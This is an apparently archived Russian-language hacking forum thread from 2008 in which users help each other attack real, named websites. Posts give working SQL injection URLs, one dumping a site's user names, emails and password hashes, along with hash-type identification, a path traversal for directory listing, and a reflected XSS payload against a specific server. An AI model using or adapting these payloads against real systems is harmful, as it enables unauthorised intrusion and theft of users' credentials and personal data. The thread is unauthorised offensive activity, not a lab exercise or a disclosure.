23.09.2008, 05:26
|
|
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
С нами:
9796693
Репутация:
659
|
|
Помогите раскрутить баг:
http://www.mymovie.in.ua/film_info.php?film_id=323
http://www.mymovie.in.ua/film_info.php?film_id=324-1
http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/UNION/**/SELECT/**/1,2,3/*
http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/GROUP/**/BY/**/4/*
http://www.mymovie.in.ua/film_info.php?film_id=999999999/**/GROUP/**/BY/**/3/*
Не получается подобрать число полей, по GROUP BY получается что должно быть 3 поля, но нет.
|
|
|
23.09.2008, 07:08
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами:
10021597
Репутация:
905
|
|
Код:
http://www.mymovie.in.ua/find.php?param=filmtype&text=-1+union+select+version()/*
|
|
|
|
23.09.2008, 07:49
|
|
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
С нами:
9796693
Репутация:
659
|
|
Благодарю, krypt3r за помощь
Нашел таблицу юзеров:
Код:
http://www.mymovie.in.ua/find.php?param=filmtype&text=-1+union+select+concat(name,0x3a,email,0x3a,pass)+from+user/*
Жаль, алгоритм хеширования не из числа популярных |
|
|
|
23.09.2008, 08:28
|
|
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
С нами:
9718355
Репутация:
310
|
|
MySQL_64bit
|
|
|
|
23.09.2008, 10:37
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами:
10021597
Репутация:
905
|
|
diehard, хэши - это хорошо =) Там, кстати, можно и без пароля зайти))
ЗЫ. Алгоритм хэширования - MySQL4 aka OLD_PASSWORD в пятом мускуле
|
|
|
|
24.09.2008, 03:59
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Помогите разобраться, вот нашёл такую вещь:
http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/Service_Online.jsp&Type=nat
Подозрение вызывает /Service_Online.jsp, вроде как это локальный инклуд, или чтение файла хз, я в этом не эксперт, скажите тут можно что нибудь сделать, или это не уязвимость?
|
|
|
|
24.09.2008, 04:10
|
|
Новичок
Регистрация: 18.09.2008
Сообщений: 15
С нами:
9286645
Репутация:
73
|
|
Сообщение от Nightmarе
Помогите разобраться, вот нашёл такую вещь:
http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/Service_Online.jsp&Type=nat
Подозрение вызывает /Service_Online.jsp, вроде как это локальный инклуд, или чтение файла хз, я в этом не эксперт, скажите тут можно что нибудь сделать, или это не уязвимость?
Можно делать листинг путем команд в переменной
пример http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/../
|
|
|
|
24.09.2008, 04:15
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Во спасибо большое!
Но вообще я так понял ничё серьёзного???
Последний раз редактировалось Nightmarе; 24.09.2008 в 04:18..
|
|
|
|
24.09.2008, 04:21
|
|
Новичок
Регистрация: 18.09.2008
Сообщений: 15
С нами:
9286645
Репутация:
73
|
|
Сообщение от Nightmarе
Во спасибо большое!
Но вообще я так понял ничё серьёзного???
в принципе да.
держи еще xss пассив =)
http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/Service_Online.jsp&Type=%3Cscript%3Ealert(%22111%2 2)%3C/script%3E
|
|
|
|
25.09.2008, 00:15
|
|
Новичок
Регистрация: 21.09.2008
Сообщений: 9
С нами:
9283286
Репутация:
1
|
|
http://сайт/id=0+union+select+1/*
Выводит
(страница 0 union select 1/* из 1)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16
Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
Как можно заюзать эту ошибку?
Последний раз редактировалось IND1G0; 25.09.2008 в 00:35..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
